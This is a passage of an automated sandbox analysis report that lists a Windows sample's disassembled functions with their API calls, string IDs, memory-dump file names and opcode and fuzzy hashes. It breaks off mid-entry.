                                                                                                        Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                        • API String ID: 2294789929-1287834457
                                                                                                        • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                        • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                        Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                        • API String ID: 2483343779-2107944366
                                                                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                        Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                        • String ID: -----$SysListView32
                                                                                                        • API String ID: 4008455318-3975388722
                                                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                        Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                        • GetParent.USER32 ref: 00469C98
                                                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                        • GetParent.USER32 ref: 00469CBC
                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                        • String ID: ComboBox$ListBox
                                                                                                        • API String ID: 2360848162-1403004172
                                                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                        Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 262282135-0
                                                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                        Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 312131281-0
                                                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                        Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                        • SendMessageW.USER32(760923D0,00001001,00000000,?), ref: 00448E16
                                                                                                        • SendMessageW.USER32(760923D0,00001026,00000000,?), ref: 00448E25
                                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                        • String ID:
                                                                                                        • API String ID: 3771399671-0
                                                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                        Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                        • String ID:
                                                                                                        • API String ID: 2156557900-0
                                                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                        Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                        • API String ID: 0-1603158881
                                                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                        Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                        • String ID: close all$ou
                                                                                                        • API String ID: 4174999648-2099725088
                                                                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                        Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMenu.USER32 ref: 00448603
                                                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 161812096-4108050209
                                                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                        Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                        • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                        Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
